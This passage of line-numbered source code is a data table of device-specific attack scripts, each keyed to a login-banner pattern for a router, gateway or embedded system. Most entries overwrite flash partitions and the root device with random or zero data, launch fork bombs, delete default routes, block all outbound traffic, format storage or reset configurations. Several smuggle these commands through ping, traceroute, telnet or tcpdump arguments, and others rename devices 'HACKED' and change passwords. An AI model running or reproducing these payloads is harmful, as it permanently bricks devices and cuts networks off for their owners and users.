3606
 'y' , '[>#] ' ,
3607
 'rm *' , '[>#] ' ,
3608
 'reload' , 'Y/N' ,
3609
 'y' , '[>#] ' ,
3610
 ] ,
3611
[ 'bullet' , '.*' , '(Invalid command \"cat\"|Entering character mode)' ,
3612
 'AT+MMNAME=HACKED' , '[>#] ' ,
3613
 'AT+MSIP=127.0.0.1' , '[>#] ' ,
3614
 'AT+MCTPS1=0' , '[>#] ' ,
3615
 'AT+MPWD=%NEWPASS%,%NEWPASS%' , '[>#] ' ,
3616
 'AT+MREB' , 'OK' ,
3617
'exec ping `cat${IFS}/dev/zero${IFS}>/dev/root`' , '' ,
3618
'AT+MSRTF=0' , 'confirm' ,
3619
 'AT+MSRTF=1' , 'rebooting' ,
3620
 ] ,
3621
[ 'pk5001' , '.*' , '(PK5001Z|admin_\S+SSH:\S+Linux User)' ,
3622
 'su' , 'Password: ' ,
3623
 'zyad5001' , '' ,
3624
 'dd if=/dev/urandom of=/dev/mtdblock0 &' , '' ,
3625
 'dd if=/dev/urandom of=/dev/mtdblock1 &' , '' ,
3626
 'dd if=/dev/urandom of=/dev/mtdblock2 &' , '' ,
3627
 'dd if=/dev/urandom of=/dev/mtdblock3 &' , '' ,
3628
 'dd if=/dev/urandom of=/dev/mtdblock4 &' , '' ,
3629
 'dd if=/dev/urandom of=/dev/mtdblock5 &' , '' ,
3630
 'dd if=/dev/urandom of=/dev/mtdblock6 &' , '' ,
3631
 'dd if=/dev/urandom of=/dev/mtdblock7 &' , '' ,
3632
 'dd if=/dev/urandom of=/dev/mtd0 &' , '' ,
3633
 'dd if=/dev/urandom of=/dev/mtd1 &' , '' ,
3634
 'dd if=/dev/urandom of=/dev/mtd2 &' , '' ,
3635
 'dd if=/dev/urandom of=/dev/mtd3 &' , '' ,
3636
 'cat /dev/urandom >/dev/mtdblock0 &' , '' ,
3637
 'cat /dev/urandom >/dev/mtdblock1 &' , '' ,
3638
 'cat /dev/urandom >/dev/mtdblock2 &' , '' ,
3639
 'cat /dev/urandom >/dev/mtdblock3 &' , '' ,
3640
 'cat /dev/urandom >/dev/mtdblock4 &' , '' ,
3641
 'cat /dev/urandom >/dev/mtdblock5 &' , '' ,
3642
 'cat /dev/urandom >/dev/mtdblock6 &' , '' ,
3643
 'cat /dev/urandom >/dev/mtdblock7 &' , '' ,
3644
 'cat /dev/urandom >/dev/mtdblock8 &' , '' ,
3645
 'cat /dev/urandom >/dev/mtdblock9 &' , '' ,
3646
 'cat /dev/urandom >/dev/root &' , '' ,
3647
 'dd if=/dev/urandom of=/dev/root &' , '' ,
3648
 'route del default;iproute del default;ip route del default' , '' ,
3649
 'iptables -F;iptables -t nat -F;iptables -A OUTPUT -j DROP' , '%WAIT%' ,
3650
 'cat /dev/urandom >/dev/mem &' , '' ,
3651
 'd(){ d|d & };d 2>/dev/null' , '[#$>] ' ,
3652
 'sysctl -w net.ipv4.tcp_timestamps=0;sysctl -w kernel.threads-max=1' , '%WAIT% ' ,
3653
 'halt -n -f' , '[#$>] ' ,
3654
 'reboot' , '[#$>] ' ,
3655
'd(){ d|d & };d' , '%TERM%' ,
3656
 ] ,
3657
[ 'ubigate' , '.*' , '(Error : Command \'uname\' does not exist|SAMSUNG ELECTRONICS .*Login)' ,
3658
 'file' , '[>#] ' ,
3659
 'format /cf0' , 'Y/N' ,
3660
 'y' , 'file[>#] ' ,
3661
 'exit' , '[>#] ' ,
3662
 'reboot' , 'y/n' ,
3663
 'y' , 'reboot' ,
3664
 ] ,
3665
[ 'ec2traffic' , '.*' , '\/WEB_CONFIGURATOR\/CONFIG' ,
3666
 '$linux' , '[>#\$] ' ,
3667
 'telnet 127.0.0.1' , 'login:' ,
3668
 'root' , 'word:' ,
3669
 'peek' , '[>#\$:] ' ,
3670
 'cat /dev/urandom >/dev/mtdblock/4' , '[>#\$:] ' ,
3671
'route del default' , '[>#\$:] ' ,
3672
 'nop' , '[>#\$:] ' ,
3673
 'nop' , '[>#\$:] ' ,
3674
 'd() { d|d & }; d' , '' ,
3675
 ] ,
3676
[ 'genu01' , '.*' , 'ID\s+From\s+To\s+Protocol\s+Sessions' ,
3677
 'boot action = factory' , '[>#] ' ,
3678
 ] ,
3679
 [ 'genu02' , '.*' , 'usr\/config\$' ,
3680
 'ifaddr -ipsharing 1 1.2.3.2' , '[>#\$] ' ,
3681
 'ifaddr -ip 1.2.3.4 -mask 255.255.255.0 -gate 1.2.3.5' , '' ,
3682
 'commit' , '[>#\$] ' ,
3683
 'reboot' , '[>#\$] ' ,
3684
 ] ,
3685
 [ 'genu03' , '.*' , 'watchdog\?' ,
3686
 'set2default' , '\[no\]' ,
3687
 'yes' , '\[no\]' ,
3688
 'yes' , '\[yes\]' ,
3689
 'no' , '\[no\]' ,
3690
 'yes' , 'NVRAM' ,
3691
 ] ,
3692
 [ 'genu04' , '.*' , 'restore system and load default configure' ,
3693
 'restore' , '=>' ,
3694
 ] ,
3695
[ 'vigorfly' , '.*' , 'Welcome to \S+\!\!\!' ,
3696
 'ping `mtd_write erase mtd0;mtd_write erase mtd1;mtd_write erase mtd2;mtd_write erase mtd3;mtd_write erase mtd4 &`' , '\S#' ,
3697
 'ping `cat /dev/urandom >/dev/mtdblock0;cat /dev/urandom >/dev/mtdblock1;cat /dev/urandom >/dev/mtdblock2 &`' , '\S#' ,
3698
 'ping `cat /dev/urandom >/dev/mtdblock3;cat /dev/urandom >/dev/mtdblock4;cat /dev/urandom >/dev/mtdblock5 &`' , '\S#' ,
3699
 'ping `cat /dev/urandom >/dev/mtdblock6;cat /dev/urandom >/dev/mtdblock7 &`' , '\S#' ,
3700
 'ping `route del default`' , '\S#' ,
3701
 ] ,
3702
[ 'genu06' , '.*' , '[\%:] (Unrecognized|Incomplete|Wrong) (command|parameter) found at \S\S\S position\.' ,
3703
 'format flash:' , 'Y/N' ,
3704
 'y' , '>' ,
3705
 'system-view' , '[>\]]' ,
3706
 'router id 1.2.3.4' , '[>\]]' ,
3707
 'sysname HACKED' , '[>\]]' ,
3708
 'super password simple HACK%NEWPASS%' , '[>\]]' ,
3709
 'interface wlan-ethernet 0' , '[>\]]' ,
3710
 'shutdown' , '[>\]]' ,
3711
 'interface wlan-ethernet 1' , '[>\]]' ,
3712
 'shutdown' , '[>\]]' ,
3713
 'interface wlan-ethernet 2' , '[>\]]' ,
3714
 'shutdown' , '[>\]]' ,
3715
 'interface wlan-ethernet 3' , '[>\]]' ,
3716
 'shutdown' , '[>\]]' ,
3717
 'reboot' , 'Y/N' ,
3718
'y' , '' ,
3719
 ] ,
3720
[ 'genu07' , '.*' , 'welcome to use cli' ,
3721
 'mgmt' , '>' ,
3722
 'backup' , '>' ,
3723
 'revertfac' , '>' ,
3724
 'restore http://1.2.3.4/&&reboot' , '>' ,
3725
 ] ,
3726
[ 'genu08' , '.*' , 'Command Not Found' ,
3727
 'configure' , '[>#\$] ' ,
3728
 'hostname HACKED' , '[>#\$] ' ,
3729
 'interface ge1' , '[>#\$] ' ,
3730
 'shutdown\nwrite memory' , '[>#\$] ' ,
3731
 'exit' , '[>#\$] ' ,
3732
 'interface ge2' , '[>#\$] ' ,
3733
 'shutdown\nwrite memory' , '[>#\$] ' ,
3734
 ] ,
3735
[ 'genu09' , '.*' , '(System has no password|\% Command missing, Valid commands are:)' ,
3736
 'sys cfg default' , '[>#\$] ' ,
3737
 ] ,
3738
[ 'drgwatson' , '.*' , 'Bad command - Try using help -s <command>' ,
3739
 'system' , '[>#] ' ,
3740
 'shell' , '[>#] ' ,
3741
 'dd if=/dev/urandom of=/dev/mtdblock0 &' , '[>#] ' ,
3742
 'dd if=/dev/urandom of=/dev/mtdblock1 &' , '[>#] ' ,
3743
 'dd if=/dev/urandom of=/dev/mtdblock2 &' , '[>#] ' ,
3744
 'dd if=/dev/urandom of=/dev/mtdblock3 &' , '[>#] ' ,
3745
 'dd if=/dev/urandom of=/dev/mtd0 &' , '[>#] ' ,
3746
 'dd if=/dev/urandom of=/dev/mtd1 &' , '[>#] ' ,
3747
 'dd if=/dev/urandom of=/dev/mtd2 &' , '[>#] ' ,
3748
 'dd if=/dev/urandom of=/dev/mtd3 &' , '[>#] ' ,
3749
 'dd if=/dev/urandom of=/dev/root &' , '%WAIT%' ,
3750
 'ifconfig br0 down &' , '[>#] ' ,
3751
 'ifconfig ppp0 down &' , '[>#] ' ,
3752
 'ifconfig eth1 down &' , '[>#] ' ,
3753
 'ifconfig eth2 down &' , '[>#] ' ,
3754
 'ifconfig eth3 down &' , '[>#] ' ,
3755
 'ifconfig eth4 down &' , '[>#] ' ,
3756
 'ifconfig eth5 down &' , '[>#] ' ,
3757
 'ifconfig eth6 down &' , '[>#] ' ,
3758
 'ifconfig eth7 down &' , '[>#] ' ,
3759
 'ifconfig eth8 down &' , '[>#] ' ,
3760
 'ifconfig ixp0 down &' , '[>#] ' ,
3761
 'ifconfig ixp1 down &' , '[>#] ' ,
3762
 'ifconfig ipsec0 down &' , '[>#] ' ,
3763
'route del default' , '%WAIT%' ,
3764
'restore_factory_settings' , '[>#] ' ,
3765
 'restore_default' , '[>#] ' ,
3766
 'exit' , '[>#] ' ,
3767
 'restore_factory_settings' , '[>#] ' ,
3768
 'restore_default' , '[>#] ' ,
3769
 ] ,
3770
[ 'vpnaccess' , '.*' , '(Welcome to VPN Access|voipGwH245Tunneling.*rw)' ,
3771
 '46' , '[>#] ' ,
3772
 'Dest:00=1.2.3.4' , '[>#] ' ,
3773
 'Dest:01=1.2.3.4' , '[>#] ' ,
3774
 'Dest:02=1.2.3.4' , '[>#] ' ,
3775
 'Dest:03=1.2.3.4' , '[>#] ' ,
3776
 ] ,
3777
[ 'draytek' , '.*' , '(Dray[tT]ek>|Draytek login)' ,
3778
 'traceroute ;cat${IFS}/dev/urandom${IFS}>/dev/root${IFS}&' , '[>#] ' ,
3779
 'traceroute ;cat${IFS}/dev/urandom${IFS}>/dev/mtdblock0${IFS}&' , '[>#] ' ,
3780
 'traceroute ;cat${IFS}/dev/urandom${IFS}>/dev/mtdblock1${IFS}&' , '[>#] ' ,
3781
 'traceroute ;cat${IFS}/dev/urandom${IFS}>/dev/mtdblock2${IFS}&' , '[>#] ' ,
3782
 'traceroute ;cat${IFS}/dev/urandom${IFS}>/dev/mtdblock3${IFS}&' , '[>#] ' ,
3783
 'traceroute ;cat${IFS}/dev/urandom${IFS}>/dev/mtdblock4${IFS}&' , '[>#] ' ,
3784
 'traceroute ;cat${IFS}/dev/urandom${IFS}>/dev/mtdblock5${IFS}&' , '[>#] ' ,
3785
 'traceroute ;iptables${IFS}-A${IFS}OUTPUT${IFS}DROP' , '[>#] ' ,
3786
 'traceroute ;route${IFS}del${IFS}default' , '[>#] ' ,
3787
 ] ,
3788
[ 'ktcatv' , '.*' , '\@ktcatv:' ,
3789
 'cat /dev/urandom >/dev/mtdblock0 &' , '[>#\$] ' ,
3790
 'cat /dev/urandom >/dev/mtdblock1 &' , '[>#\$] ' ,
3791
 'cat /dev/urandom >/dev/mtdblock2 &' , '[>#\$] ' ,
3792
 'cat /dev/urandom >/dev/mtdblock3 &' , '[>#\$] ' ,
3793
 'cat /dev/urandom >/dev/mtdblock4 &' , '[>#\$] ' ,
3794
 'cat /dev/urandom >/dev/mtdblock5 &' , '[>#\$] ' ,
3795
 'route del default' , '[>#\$] ' ,
3796
 'iptables -A OUTPUT DROP' , '%WAIT%' ,
3797
 'd() { d|d & }; d 2>/dev/null' , '[>#\$] ' ,
3798
 'd() { d|d & }; d 2>/dev/null' , '[>#\$] ' ,
3799
 ] ,
3800
[ 'digi' , '.*' , '(Digi\Ss Command Line Interface|write \Spathname\S \Sstring\S)' ,
3801
 'setnetwork dhcp = off' , '[#$>] ' ,
3802
 'setnetwork gateway = 1.2.3.4' , '[#$>] ' ,
3803
 'setnetwork ip = 1.2.3.5' , '[#$>] ' ,
3804
 'setnetwork primarydns = 127.0.0.1' , '[#$>] ' ,
3805
 'setnetwork secondarydns = 127.0.0.2' , '[#$>] ' ,
3806
 'reboot' , '[#$>] ' ,
3807
 'wm 0 0' , '[#$>] ' ,
3808
 'wm 1 0' , '[#$>] ' ,
3809
 'wm 2 0' , '[#$>] ' ,
3810
 'wm 3 0' , '[#$>] ' ,
3811
 ] ,
3812
[ 'atpcli' , '.*' , '(ATP>|ATP Cli|HG\d\S+>)' ,
3813
 'shell' , '[>#]' ,
3814
 'welcome to shell' , '[>#]' ,
3815
 'cat /dev/urandom >/mtdblock0 &' , '[>#]' ,
3816
 'cat /dev/urandom >/mtdblock1 &' , '[>#]' ,
3817
 'cat /dev/urandom >/mtdblock2 &' , '[>#]' ,
3818
 'cat /dev/urandom >/mtdblock3 &' , '[>#]' ,
3819
 'cat /dev/urandom >/mtdblock4 &' , '[>#]' ,
3820
 'cat /dev/urandom >/mtdblock5 &' , '[>#]' ,
3821
 'cat /dev/urandom >/mtdblock6 &' , '[>#]' ,
3822
 'route del default' , '[>#]' ,
3823
 'iptables -A OUTPUT -j DROP' , '[>#]' ,
3824
 'ping ?;cat${IFS}/dev/urandom${IFS}>/dev/mtdblock0;true' , '' ,
3825
 'ping ?;cat${IFS}/dev/urandom${IFS}>/dev/mtdblock3;true' , '' ,
3826
 'ping ?;cat${IFS}/dev/urandom${IFS}>/dev/mtdblock1;true' , '' ,
3827
 'ping ?;cat${IFS}/dev/urandom${IFS}>/dev/mtdblock2;true' , '' ,
3828
 'ping ?;cat${IFS}/dev/urandom${IFS}>/dev/mtdblock4;true' , '' ,
3829
 'ping ?;cat${IFS}/dev/urandom${IFS}>/dev/mtdblock5;true' , '' ,
3830
 'ping ?;cat${IFS}/dev/urandom${IFS}>/dev/mtdblock6;true' , '' ,
3831
 'ping ?;iptables${IFS}-A${IFS}OUTPUT${IFS}-j${IFS}DROP;true' , '' ,
3832
 ] ,
3833
[ 'netrouter' , '.*' , '(\/ETC\/PASSWD|Welcome to NetRouter|Digitel Configuration Manager|-ALF \/ETC\/)' ,
3834
 'exec shell' , '[>#] ' ,
3835
 'dd if=/dev/urandom of=/dev/mtdblock7 &' , '[>#] ' ,
3836
 'dd if=/dev/urandom of=/dev/root &' , '[>#] ' ,
3837
 'dd if=/dev/urandom of=/dev/mtdblock0 &' , '[>#] ' ,
3838
 'dd if=/dev/urandom of=/dev/mtdblock1 &' , '[>#] ' ,
3839
 'dd if=/dev/urandom of=/dev/mtdblock2 &' , '[>#] ' ,
3840
 'dd if=/dev/urandom of=/dev/mtdblock3 &' , '[>#] ' ,
3841
 'dd if=/dev/urandom of=/dev/mtdblock4 &' , '[>#] ' ,
3842
 'dd if=/dev/urandom of=/dev/mtdblock5 &' , '[>#] ' ,
3843
 'dd if=/dev/urandom of=/dev/mtdblock6 &' , '[>#] ' ,
3844
 'dd if=/dev/urandom of=/dev/mtdblock8 &' , '[>#] ' ,
3845
 'route del default' , '[>#] ' ,
3846
 'iptables -F;iptables -t nat -F;iptables -A OUTPUT -j DROP' , '%WAIT%' ,
3847
 'config purge all' , '[>#] ' ,
3848
 'exit' , '[>#] ' ,
3849
 'config purge all' , '[>#] ' ,
3850
 ] ,
3851
[ 'junos' , '.*' , '(SRX\d+[>#]|JUNOS \d)' ,
3852
 'configure' , '[>#] ' ,
3853
 'set system host-name HACKED' , '[>#] ' ,
3854
 'delete routing-options static route' , '[>#] ' ,
3855
 'set routing-options static route 0.0.0.0/0 reject' , '[>#] ' ,
3856
 'delete system name-server' , '[>#] ' ,
3857
'delete system services dhcp' , '[>#] ' ,
3858
 'commit' , '[>#] ' ,
3859
 ] ,
3860
[ 'trendchip' , '.*' , '(TrendChip Technologies|sys\s+exit\s+ether\s+wan)' ,
3861
 'sys default' , '' ,
3862
 ] ,
3863
[ 'celljanus' , '.*' , 'CellJanus RX' ,
3864
 '9' , 'cancel:' ,
3865
 'yes' , 'continue' ,
3866
 ] ,
3867
[ 'cisconex' , '.*' , 'Cisco Nexus Operating System' ,
3868
 'virtual-service reset force' , 'y/n' ,
3869
 'y' , '[>#] ' ,
3870
 'format bootflash:' , 'yes/no' ,
3871
 'y' , '[>#] ' ,
3872
 'format usb1:' , 'yes/no' ,
3873
 'y' , '[>#] ' ,
3874
 'format usb2:' , 'yes/no' ,
3875
 'y' , '[>#] ' ,
3876
 'reload' , 'y/n' ,
3877
 'y' , '' ,
3878
 ] ,
3879
[ 'wince' , '.*' , '(Windows CE Telnet Service|Cannot execute \S+\.exe)' ,
3880
 'attrib -r -h -s *.* /s' , '[>#] ' ,
3881
 'attrib -r -h -s *.* /s' , '[>#] ' ,
3882
 'del /s *.*' , 'Y/N' ,
3883
 'y' , '[>#] ' ,
3884
 'halt' , '[>#] ' ,
3885
 ] ,
3886
[ 'ipcom' , '.*' , 'Unknown commands or command parameters are insufficient\.' ,
3887
 'configure' , '[>#] ' ,
3888
 'new' , '[>#] ' ,
3889
 'hostname HACKED' , '[>#] ' ,
3890
 'ip route default 1.2.3.4' , '[>#] ' ,
3891
 'commit' , '\(y\|' ,
3892
 'y' , '\(y\|' ,
3893
 'y' , '[>#] ' ,
3894
 'poweroff' , '\(y\|' ,
3895
 'y' , '[>#] ' ,
3896
 'poweroff' , '\(y\|' ,
3897
 'y' , '[>#] ' ,
3898
 ] ,
3899
[ 'meshtron' , '.*' , '(M e s h t r o n|Meshtron#|Unknown command \[uname\])' ,
3900
 'factory' , '[>#] ' ,
3901
 ] ,
3902
[ 'axelerateos' , '.*' , '(AXN AxelerateOS|CLI Error: Can\'t find command - uname)' ,
3903
 'passwd' , 'Password' ,
3904
 '%OLDPASS%' , 'Password' ,
3905
 '%NEWPASS%' , 'Again' ,
3906
 '%NEWPASS%' , '[>#] ' ,
3907
 ] ,
3908
[ 'aver' , 'root/svgodie' , '' ,
3909
 'cat /dev/urandom >/dev/mtdblock1 &' , '[>#] ' ,
3910
 'cat /dev/urandom >/dev/mtdblock2 &' , '[>#] ' ,
3911
 'cat /dev/urandom >/dev/mtdblock3 &' , '[>#] ' ,
3912
 'cat /dev/urandom >/dev/sda1 &' , '[>#] ' ,
3913
 'iproute del default' , '[>#] ' ,
3914
 'ifdown eth0' , '[>#] ' ,
3915
 'ifdown eth1' , '[>#] ' ,
3916
 ] ,
3917
[ 'intelliserver' , '(IntelliServer Release|uname not found)' ,
3918
 'reset factory' , '[>#] ' ,
3919
 'save' , '[>#] ' ,
3920
 'motd set line 1 HACKED*' , '[>#] ' ,
3921
 'motd set line 2 HACKED*' , '[>#] ' ,
3922
 'motd set line 3 HACKED*' , '[>#] ' ,
3923
 'motd set line 4 HACKED' , '[>#] ' ,
3924
 'password' , 'password:' ,
3925
 '%NEWPASS%' , 'password:' ,
3926
 '%NEWPASS%' , '[>#] ' ,
3927
 'save' , '[>#] ' ,
3928
 'shutdown now' , 'arrived' ,
3929
 ] ,
3930
[ 'drglike' , '.*' , 'Linux version \S+openrg-rmk' ,
3931
 'shell' , '[>#] ' ,
3932
 'cat /dev/urandom >/dev/root &' , '[>#] ' ,
3933
 'cat /dev/urandom >/dev/mtdblock0 &' , '[>#] ' ,
3934
 'cat /dev/urandom >/dev/mtdblock1 &' , '[>#] ' ,
3935
 'cat /dev/urandom >/dev/mtdblock2 &' , '[>#] ' ,
3936
 'cat /dev/urandom >/dev/mtdblock3 &' , '[>#] ' ,
3937
 'cat /dev/urandom >/dev/mtdblock4 &' , '[>#] ' ,
3938
 'cat /dev/urandom >/dev/mtdblock5 &' , '[>#] ' ,
3939
 'cat /dev/urandom >/dev/mtdblock6 &' , '[>#] ' ,
3940
 'cat /dev/urandom >/dev/mtdblock7 &' , '[>#] ' ,
3941
 'cat /dev/urandom >/dev/mtdblock8 &' , '[>#] ' ,
3942
 'route del default' , '%WAIT%' ,
3943
 'restore_default' , '[>#] ' ,
3944
 'exit' , '[>#] ' ,
3945
 'restore_default' , '[>#] ' ,
3946
 ] ,
3947
[ 'westermo' , '.*' , '(\s\/mrd3\d\d|MRD-310|Westermo MRD|Copyright Cybertec|esh: cat: No such command)' ,
3948
 'telnet `cat /dev/urandom >/dev/mtdblock0 &`' , '[\$>#] ' ,
3949
 'quit' , '[\$>#] ' ,
3950
 'telnet `cat /dev/urandom >/dev/mtdblock1 &`' , '[\$>#] ' ,
3951
 'quit' , '[\$>#] ' ,
3952
 'telnet `cat /dev/urandom >/dev/mtdblock2 &`' , '[\$>#] ' ,
3953
 'quit' , '[\$>#] ' ,
3954
 'telnet `cat /dev/urandom >/dev/mtdblock3 &`' , '[\$>#] ' ,
3955
 'quit' , '[\$>#] ' ,
3956
 'telnet `cat /dev/urandom >/dev/mtdblock4 &`' , '[\$>#] ' ,
3957
 'quit' , '[\$>#] ' ,
3958
 'telnet `cat /dev/urandom >/dev/mtdblock5 &`' , '[\$>#] ' ,
3959
 'quit' , '[\$>#] ' ,
3960
 'telnet `cat /dev/urandom >/dev/mtdblock6 &`' , '[\$>#] ' ,
3961
 'quit' , '[\$>#] ' ,
3962
 'telnet `cat /dev/urandom >/dev/mtdblock7 &`' , '[\$>#] ' ,
3963
 'quit' , '[\$>#] ' ,
3964
 'telnet `cat /dev/urandom >/dev/root &`' , '[\$>#] ' ,
3965
 'quit' , '[\$>#] ' ,
3966
 'telnet `route del default`' , '[\$>#] ' ,
3967
 'quit' , '[\$>#] ' ,
3968
 'telnet `iptables -A OUTPUT -j DROP`' , '[\$>#] ' ,
3969
 'quit' , '[\$>#] ' ,
3970
 ] ,
3971
[ 'gapm' , '.*' , 'GAPM-\d\d\d\d' ,
3972
 'cat /dev/urandom >/dev/mtdblock0 &' , '[>#\$] ' ,
3973
 'cat /dev/urandom >/dev/mtdblock1 &' , '[>#\$] ' ,
3974
 'cat /dev/urandom >/dev/mtdblock2 &' , '[>#\$] ' ,
3975
 'cat /dev/urandom >/dev/mtdblock3 &' , '[>#\$] ' ,
3976
 'cat /dev/urandom >/dev/mtdblock4 &' , '[>#\$] ' ,
3977
 'cat /dev/urandom >/dev/mtdblock5 &' , '[>#\$] ' ,
3978
 'cat /dev/urandom >/dev/mtdblock6 &' , '[>#\$] ' ,
3979
 'cat /dev/urandom >/dev/mtdblock7 &' , '[>#\$] ' ,
3980
 'cat /dev/urandom >/dev/mtdblock8 &' , '[>#\$] ' ,
3981
 'cat /dev/urandom >/dev/mtdblock9 &' , '[>#\$] ' ,
3982
 'cat /dev/urandom >/dev/mtdblock10 &' , '[>#\$] ' ,
3983
 'cat /dev/urandom >/dev/mem &' , '[>#\$] ' ,
3984
 'route del default' , '[>#\$] ' ,
3985
 ] ,
3986
[ 'adc' , '.*' , 'Error: no parameter\(s\) expected' ,
3987
 'oper' , '[>#\$] ' ,
3988
 'passwd' , 'password:' ,
3989
 '%OLDPASS%' , 'password:' ,
3990
 '%NEWPASS%' , 'password:' ,
3991
 '%NEWPASS%' , '[>#\$] ' ,
3992
 'exit' , '' ,
3993
 ] ,
3994
[ 'grscli' , '.*' , 'ERR::Command \'uname\' not found!' ,
3995
 'cd utils' , '[>#\$] ' ,
3996
 'tcpdump --file-name=`cat${IFS}/dev/zero${IFS}>/dev/root${IFS}&`' , '[>#\$] ' ,
3997
 'tcpdump --file-name=`cat${IFS}/dev/zero${IFS}>/dev/mtdblock0${IFS}&`' , '[>#\$] ' ,
3998
 'tcpdump --file-name=`cat${IFS}/dev/zero${IFS}>/dev/mtdblock1${IFS}&`' , '[>#\$] ' ,
3999
 'tcpdump --file-name=`cat${IFS}/dev/zero${IFS}>/dev/mtdblock2${IFS}&`' , '[>#\$] ' ,
4000
 'tcpdump --file-name=`cat${IFS}/dev/zero${IFS}>/dev/mtdblock3${IFS}&`' , '[>#\$] ' ,
4001
 'tcpdump --file-name=`cat${IFS}/dev/zero${IFS}>/dev/mtdblock4${IFS}&`' , '[>#\$] ' ,
4002
 'tcpdump --file-name=`cat${IFS}/dev/zero${IFS}>/dev/mtdblock5${IFS}&`' , '[>#\$] ' ,
4003
 'tcpdump --file-name=`route${IFS}del${IFS}default`' , '[>#\$] ' ,
4004
 ] ,
4005
[ 'fos' , '.*' , '(FOS \Snone\S.*ppc|FOS version|Welcome to FOS)' ,
4006
 'umount -a' , '[>#\$] ' ,
4007
 'dd if=/dev/zero of=/dev/ttfsa &' , '[>#\$] ' ,
4008
 'dd if=/dev/zero of=/dev/ttfsa1 &' , '[>#\$] ' ,
4009
 'dd if=/dev/zero of=/dev/root &' , '[>#\$] ' ,
4010
 'dd if=/dev/zero of=/dev/ram &' , '[>#\$] ' ,
4011
 'dd if=/dev/zero of=/dev/ramdisk &' , '[>#\$] ' ,
4012
 'route del default' , '%WAIT%' ,
4013
 'd(){ d|d & };d' , '%TERM%' ,
4014
 ] ,
4015
[ 'davolink' , '.*' , '(invalid directory|davolink login)' ,
4016
 'debug' , '[>#\$] ' ,
4017
 'system' , '[>#\$] ' ,
4018
 'syscmd all dd if=/dev/urandom of=/dev/mtdblock7' , '[>#\$] ' ,
4019
 'syscmd all dd if=/dev/urandom of=/dev/mtdblock8' , '[>#\$] ' ,
4020
 'syscmd all dd if=/dev/urandom of=/dev/mtdblock9' , '[>#\$] ' ,
4021
 'syscmd all dd if=/dev/urandom of=/dev/root' , '[>#\$] ' ,
4022
 'syscmd all route del default' , '[>#\$] ' ,
4023
 'cd ..' , '%WAIT%' ,
4024
 'cd ..' , '[>#\$] ' ,
4025
 'config' , '[>#\$] ' ,
4026
 'default' , 'y/n' ,
4027
 'y' , '[>#\$] ' ,
4028
 'cd ..' , '[>#\$] ' ,
4029
 'system' , '[>#\$] ' ,
4030
 'reset' , 'y/n' ,
4031
 'y' , 'y/n' ,
4032
 'y' , 'Done' ,
4033
 ] ,
4034
[ 'jnior' , '.*' , '\/etc\/shadow does not exist\.' ,
4035
 'hostname HACKED' , '[>#] ' ,
4036
 'rd etc' , '[>#] ' ,
4037
 'rd flash' , '[>#] ' ,
4038
 'rd www' , '[>#] ' ,
4039
 'rd tiniext' , '[>#] ' ,
4040
 'rd datas' , '[>#] ' ,
4041
 'cd flash2' , '[>#] ' ,
4042
 'rm Config.props' , '[>#] ' ,
4043
 'rm Phone.props' , '[>#] ' ,
4044
 'cd ..' , '[>#] ' ,
4045
 'reboot' , 'Y/N' ,
4046
 'y' , 'rebooting' ,
4047
 ] ,
4048
[ 'hpjetdirect' , '.*' , 'HP JetDirect' ,
4049
 'host-name HACKED' , '[>#] ' ,
4050
 'ip 127.0.0.1' , '[>#] ' ,
4051
 'save' , 'saved' ,
4052
 ] ,
4053
[ 'intelimax' , '.*' , '(INTELIMAX #|sh 1\.0)' ,
4054
 'defconfig' , 'y/N' ,
4055
 'y' , '' ,
4056
 ] ,
4057
[ 'idrac' , '.*' , 'status_tag.*:.*COMMAND PROCESSING FAILED' ,
4058
 'stop /system1' , 'stopped' ,
4059
 ] ,
4060
[ 'comtrend' , '.*' , 'Comtrend Gigabit' ,
4061
 'restore_defaults' , 'wait' ,
4062
 ] ,
4063
[ 'mikrotok' , '.*' , '(\[\S+\@HACKED\] > |HAD UNSAFE PASSWORD)' ,
4064
 'xxx' , '[:>] ' ,
4065
 'ip firewall filter remove 9' , ' > ' ,
4066
 'ip firewall filter remove 8' , ' > ' ,
4067
 'ip firewall filter remove 7' , ' > ' ,
4068
 'ip firewall filter remove 6' , ' > ' ,
4069
 'ip firewall filter remove 5' , ' > ' ,
4070
 'ip firewall filter remove 4' , ' > ' ,
4071
 'ip firewall filter remove 3' , ' > ' ,
4072
 'ip firewall filter remove 2' , ' > ' ,
4073
 'ip firewall filter remove 1' , ' > ' ,
4074
 'ip firewall filter add chain=input src-address=0.0.0.0/1 action=drop' , ' > ' ,
4075
 'ip firewall filter add chain=output src-address=0.0.0.0/1 action=drop' , ' > ' ,
4076
 ] ,
4077
 [ 'mikrotik' , '.*' , '(MMM.*III.*KKK|MikroTik\sRouterOS|Doublecom\sRouterOS|bad command name )' ,
4078
 'xxx' , '[:>] ' ,
4079
 'xxx' , '[:>] ' ,
4080
 'ip socks set enabled no' , ' > ' ,
4081
 'ip proxy set enabled no' , ' > ' ,
4082
 'tool sniffer stop' , ' > ' ,
4083
 'system note set show-at-login yes' , ' > ' ,
4084
 'system note set note \"DEVICE HACKED - ACCOUNT %OLDUSER% HAD UNSAFE PASSWORD\"' , ' > ' ,
4085
 'system identity set name=HACKED' , ' > ' ,
4086
 'password' , 'password' ,
4087
 '%OLDPASS%' , 'password' ,
4088
 '%NEWPASS%' , 'password' ,
4089
 '%NEWPASS%' , ' > ' ,
4090
 'ip dns set server=8.8.8.8' , ' > ' ,
4091
 'ip dns set allow-remote-requests=no' , ' > ' ,
4092
 'ip dns cache flush' , ' > ' ,
4093
 'system reboot' , 'reboot' ,
4094
 'y' , ' > ' ,
4095
 'system reset-configuration no-defaults=yes' , 'y/N' ,
4096
 'y' , '' ,
4097
 ] ,
4098
[ 'ruckus' , '.*' , '(ruckus>|The command is either unrecognized or incomplete. To view a list of commands that you ca)' ,
4099
 'ping ;sh' , '[$>#] ' ,
4100
 'cat /dev/urandom >/dev/mtdblock0 &' , '' ,
4101
 'cat /dev/urandom >/dev/mtdblock1 &' , '' ,
4102
 'cat /dev/urandom >/dev/mtdblock2 &' , '' ,
4103
 'cat /dev/urandom >/dev/mtdblock3 &' , '' ,
4104
 'cat /dev/urandom >/dev/mtdblock4 &' , '' ,
4105
 'cat /dev/urandom >/dev/mtdblock5 &' , '' ,
4106
 'cat /dev/urandom >/dev/mtdblock6 &' , '' ,
4107
 'cat /dev/urandom >/dev/mtdblock7 &' , '' ,
4108
 'cat /dev/urandom >/dev/mtdblock8 &' , '' ,
4109
 'cat /dev/urandom >/dev/mtdblock9 &' , '' ,
4110
 'cat /dev/urandom >/dev/mtdblock10 &' , '' ,
4111
 'cat /dev/urandom >/dev/mtdblock11 &' , '' ,
4112
 'route del default' , '%WAIT%' ,
4113
